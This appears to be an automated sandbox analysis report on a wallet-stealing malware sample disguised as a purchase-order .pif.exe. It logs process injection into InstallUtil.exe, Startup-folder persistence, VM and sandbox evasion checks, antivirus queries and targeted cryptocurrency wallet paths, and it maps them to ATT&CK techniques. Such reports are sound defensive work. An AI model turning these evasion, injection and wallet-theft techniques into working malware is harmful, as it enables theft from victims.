Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara match File source: 4.2.IsNestedFamANDAssem.exe.4883b08.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.PO-12202432_ACD_Group.pif.exe.6590000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.PO-12202432_ACD_Group.pif.exe.3b909a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.69496394260.0000000003928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 4992, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: IsNestedFamANDAssem.exe PID: 1788, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_00E526C0 push esp; ret 0_2_00E526C9
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_0648ABEE push eax; iretd 0_2_0648AC45
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_0648ABE1 push es; retf 0_2_0648ABEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06480905 push esp; ret 0_2_0648090D
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_064E92E0 push eax; iretd 0_2_064E95B1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_064E3290 push es; ret 0_2_064E3340
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_064E6B50 push 1C064CB3h; iretd 0_2_064E6BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_064E8B10 push esp; retf 0_2_064E8D59
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_0658B636 pushfd ; retn 0000h 0_2_0658B63B
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_0658AB65 push edi; iretd 0_2_0658AB66
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06582C9D push es; iretd 0_2_06582CC0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06582C96 push es; retf 0_2_06582C98
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06582D01 push es; ret 0_2_06582D1C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06582D81 push es; iretd 0_2_06582D94
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_066A5ED0 push 00000006h; iretd 0_2_066A5EEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_066A2ABB pushad ; retf 0_2_066A2AC1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_066A61A6 push ds; iretd 0_2_066A61A7
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Code function: 0_2_06977C5B push E9E9906Ch; iretd 0_2_06977C60
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_013426BA push esp; ret 4_2_013426C9
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06B4ABEE push eax; iretd 4_2_06B4AC45
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06B40905 push esp; ret 4_2_06B4090D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06BA3290 push es; ret 4_2_06BA3340
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06BA8B10 push esp; retf 4_2_06BA8D59
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06C4B636 pushfd ; retn 0000h 4_2_06C4B63B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06C4AB65 push edi; iretd 4_2_06C4AB66
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06C42C95 push es; retf 4_2_06C42C98
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06C42C29 push es; ret 4_2_06C42C74
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06C42D1D push es; iretd 4_2_06C42D80
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Code function: 4_2_06D7CF76 push es; iretd 4_2_06D7CF7C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe File created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                  Boot Survival

                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 4992, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: IsNestedFamANDAssem.exe PID: 1788, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory allocated: E50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory allocated: 2920000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory allocated: 4920000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1140000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F20000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4F20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory allocated: 1340000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory allocated: 3150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory allocated: 15C0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 24C0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 26C0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 24E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Window / User API: threadDelayed 9935
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 9947
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Window / User API: threadDelayed 9882
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1316 Thread sleep count: 9935 > 30
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99875s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99766s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99641s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99516s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99406s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99297s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99188s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -99063s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -98938s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -98828s >= -30000s
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908 Thread sleep time: -98719s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5584 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4452 Thread sleep count: 9947 > 30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3600 Thread sleep count: 9882 > 30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99766s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 4808 Thread sleep count: 67 > 30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -99000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -98891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096 Thread sleep time: -98781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7308 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 100000
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99875
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99766
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99641
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99516
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99406
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99297
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99188
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 99063
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 98938
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 98828
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Thread delayed: delay time: 98719
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99891
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99766
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99656
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99547
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99437
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99328
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99219
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99109
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 99000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 98891
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Thread delayed: delay time: 98781
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                  Source: IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: HgfS5paYPq
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: GD7YGf2sqemUAekHdy6
                  Source: InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69696765541.00000000010CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 590000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C74008
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 590000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 592000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5F0000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5F2000
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 373008
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager*
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000329C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerh{
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Queries volume information: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe VolumeInformation
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Queries volume information: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
                  Source: InstallUtil.exe, 00000002.00000002.71833522803.0000000005A60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB)
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000003244000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000003244000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus Web3
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: Yara match File source: 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6340, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6000, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 111 Scripting | Valid Accounts | 321 Windows Management Instrumentation | 111 Scripting | 212 Process Injection | 1 Masquerading | OS Credential Dumping | 621 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
